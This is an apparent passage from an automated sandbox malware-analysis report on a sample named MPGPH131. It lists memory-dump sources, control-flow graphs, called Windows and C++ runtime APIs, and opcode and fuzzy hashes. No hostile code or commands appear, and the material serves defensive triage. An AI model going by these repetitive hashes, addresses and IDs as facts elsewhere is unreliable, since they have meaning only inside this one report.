                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 942d4728a3dec9e920f058ae75b6e18efaf17d7f21c585f3ef03cbfb3fa01d64
                                      • Instruction ID: 0be7e87111cf3c9c85edf8a05f7e4d46f18e0f59620948cc2165317545216ed5
                                      • Opcode Fuzzy Hash: 942d4728a3dec9e920f058ae75b6e18efaf17d7f21c585f3ef03cbfb3fa01d64
                                      • Instruction Fuzzy Hash: 7D116B3365C12025D765227C6C4677E2BC9CF83774F3909D9F8159B1D2EF2D9C424245

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 483 b9ad7c-b9ad94 call ba7400 486 b9adaa-b9adc0 SetFilePointerEx 483->486 487 b9ad96-b9ad9d 483->487 488 b9adc2-b9add3 call b99f28 486->488 489 b9add5-b9addf 486->489 490 b9ada4-b9ada8 487->490 488->490 489->490 491 b9ade1-b9adf6 489->491 492 b9adfb-b9adfe 490->492 491->492
                                      APIs
                                      • SetFilePointerEx.KERNELBASE(00000000,00000000,00BDF970,00B8B2D2,00000002,00B8B2D2,00000000,?,?,?,00B9AE86,00000000,?,00B8B2D2,00000002,00BDF970), ref: 00B9ADB8
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 5de8d3ee48d202388e21580272e48509900c661970e352824e4209deb13f0faa
                                      • Instruction ID: 27bd91bcc3bc90e6412a60d850fab847c8c59a191724f81e69ecb4461b885105
                                      • Opcode Fuzzy Hash: 5de8d3ee48d202388e21580272e48509900c661970e352824e4209deb13f0faa
                                      • Instruction Fuzzy Hash: 4E012B326141456FCF098F58DC49D9E3BA9DF81330F3501A8F8119B2E0EA71DD418BD0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 496 b8bfb1-b8bfb4 497 b8bfc3-b8bfc6 call b9ac4c 496->497 499 b8bfcb-b8bfce 497->499 500 b8bfd0-b8bfd1 499->500 501 b8bfb6-b8bfc1 call b9e4f8 499->501 501->497 504 b8bfd2-b8bfd6 501->504 505 b8bfdc 504->505 506 ab1fa0-ab1ff0 call ab1f80 call b8dc1b call b8d371 504->506 505->505
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00AB1FDE
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID:
                                      • API String ID: 2659868963-0
                                      • Opcode ID: d13312a40ae0aba2800e1300753dba95f17646a2421c4c07496071a155334446
                                      • Instruction ID: 085eb2663a62a95208150d570014491e8bcc18c5cf6109b73a553c9e1f129c28
                                      • Opcode Fuzzy Hash: d13312a40ae0aba2800e1300753dba95f17646a2421c4c07496071a155334446
                                      • Instruction Fuzzy Hash: D001FE3640420D77CB14FBB4EC01D99B7ECDE11360B5085B6FA149A5A1FBB0E590C7D5

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 513 ba3113-ba311e 514 ba312c-ba3132 513->514 515 ba3120-ba312a 513->515 517 ba314b-ba315c RtlAllocateHeap 514->517 518 ba3134-ba3135 514->518 515->514 516 ba3160-ba316b call b99f5f 515->516 523 ba316d-ba316f 516->523 519 ba315e 517->519 520 ba3137-ba313e call ba0cb3 517->520 518->517 519->523 520->516 526 ba3140-ba3149 call b9e4f8 520->526 526->516 526->517
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,00B8A41C,?,?,00BA2A99,00000001,00000364,?,00000006,000000FF,?,00B8D39B,?,?,?,?), ref: 00BA3155
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 574364ca675131a036ac81d17e2907d6a1bfcaaeb8f53c619f3a9c9ddc3773fb
                                      • Instruction ID: 3c0eec96febdbc4c2cf5f99440b824d33a1ec3e58f4ab83a55781115bece6f33
                                      • Opcode Fuzzy Hash: 574364ca675131a036ac81d17e2907d6a1bfcaaeb8f53c619f3a9c9ddc3773fb
                                      • Instruction Fuzzy Hash: 14F0E93160D728669B616B6A8C41B5B77C9DF43FB0F1580E1BC18BA180CB30EA4041E0
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00B8D39B,?,?,?,?,?,00AB2D8D,00B8A41C,?,?,00B8A41C), ref: 00BA3B80
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 62f86ca7a72307a1a6d146e253e7ca1c9bd58037cc3e1071884428e9ff753618
                                      • Instruction ID: f14498b95850780c8b055871d4e44cf7fdb5e6b03e24c9fa8a5a95d9e3e4cf4d
                                      • Opcode Fuzzy Hash: 62f86ca7a72307a1a6d146e253e7ca1c9bd58037cc3e1071884428e9ff753618
                                      • Instruction Fuzzy Hash: 06E0ED3150D320A6EA2036298C80B6B66CBCB87BB0F9506E4BC189A181DB60CE0081B1
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00B1A143
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00B1A165
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00B1A185
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00B1A1AF
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00B1A21D
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B1A269
                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00B1A283
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00B1A318
                                      • std::_Facet_Register.LIBCPMT ref: 00B1A325
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
                                      • String ID: bad locale name
                                      • API String ID: 3375549084-1405518554
                                      • Opcode ID: 7c73dfb67b9350a1d9440c59c08f9e27c15b2e6d5a2ec30447569bd7165b136d
                                      • Instruction ID: 1c31f9b67f7353acd85aa191f0651b1bba2dfc16eb672bb90e8a8894736f2356
                                      • Opcode Fuzzy Hash: 7c73dfb67b9350a1d9440c59c08f9e27c15b2e6d5a2ec30447569bd7165b136d
                                      • Instruction Fuzzy Hash: A4616DB1D01248ABEF11DFA4D885BDEBBF4AF15310F5440A9E804AB351EB74E945CB92
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00AB37E9
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AB3835
                                      • __Getctype.LIBCPMT ref: 00AB384E
                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00AB386A
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00AB38FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                      • String ID: bad locale name
                                      • API String ID: 1840309910-1405518554
                                      • Opcode ID: 7c5026ce55ebd24fdb4a84e4a177c61004b189f5fe22b144e5cd2ec10522e956
                                      • Instruction ID: 5a568cb7bf7b580ca51d0cbdf8568b1f8e2f7a44432782997672ef72e0d77e5c
                                      • Opcode Fuzzy Hash: 7c5026ce55ebd24fdb4a84e4a177c61004b189f5fe22b144e5cd2ec10522e956
                                      • Instruction Fuzzy Hash: 1B5130B2D002489BEF10DFE4D845BDEFBF8AF14710F144169E815AB342E775AA45CB92
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00B8FB67
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00B8FB6F
                                      • _ValidateLocalCookies.LIBCMT ref: 00B8FBF8
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00B8FC23
                                      • _ValidateLocalCookies.LIBCMT ref: 00B8FC78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: d20dd6ea4abd7519c5fa889bb64a10410c79e7159f8a2c26ba46cbc97ba97a7b
                                      • Instruction ID: 97d3bd18c6fa46e2b6ccbb7ea36dc0064968b37612fa2f3397dd5299d65e515c
                                      • Opcode Fuzzy Hash: d20dd6ea4abd7519c5fa889bb64a10410c79e7159f8a2c26ba46cbc97ba97a7b
                                      • Instruction Fuzzy Hash: 76418630A002099BCF10FF68C895AAEBBF5EF45324F1481E5EC149B3A2D771EA55CB91
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00B18903
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00B18926
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00B18946
                                      • std::_Facet_Register.LIBCPMT ref: 00B189BB
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00B189D3
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00B189EB
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                      • String ID:
                                      • API String ID: 2081738530-0
                                      • Opcode ID: 36622bbff23c417db79e5455106890e21b916cb544cef1d5dd4a1b1d8b2e337c
                                      • Instruction ID: 9fef14cf03083a510d955d48e3857d8c0d7c5daea8cab51a04fc35088b44c229
                                      • Opcode Fuzzy Hash: 36622bbff23c417db79e5455106890e21b916cb544cef1d5dd4a1b1d8b2e337c
                                      • Instruction Fuzzy Hash: 2A41E271900259DFCF10DF54D881AAEBBF5FB05360F5442AAE915AB361DB30AE80CBD2
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00AB60F2
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00AB617F
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00AB6248
                                      Strings
                                      • recursive_directory_iterator::operator++, xrefs: 00AB61CC
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy$___std_exception_copy
                                      • String ID: recursive_directory_iterator::operator++
                                      • API String ID: 1206660477-953255998
                                      • Opcode ID: 835b01908be9d61120e91b30b96a91f5e75459aee68c2b44e49f0b4680c020b9
                                      • Instruction ID: ccefc026624453d60dbb2275f385abe3c79396f4e2f129c8c863f68e62bd4c88
                                      • Opcode Fuzzy Hash: 835b01908be9d61120e91b30b96a91f5e75459aee68c2b44e49f0b4680c020b9
                                      • Instruction Fuzzy Hash: 3BE1F0B19006049FDB28DF68D845BAEFBF9FF44300F14866DE41693792D774AA44CBA1
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00AB86DE
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00AB86ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
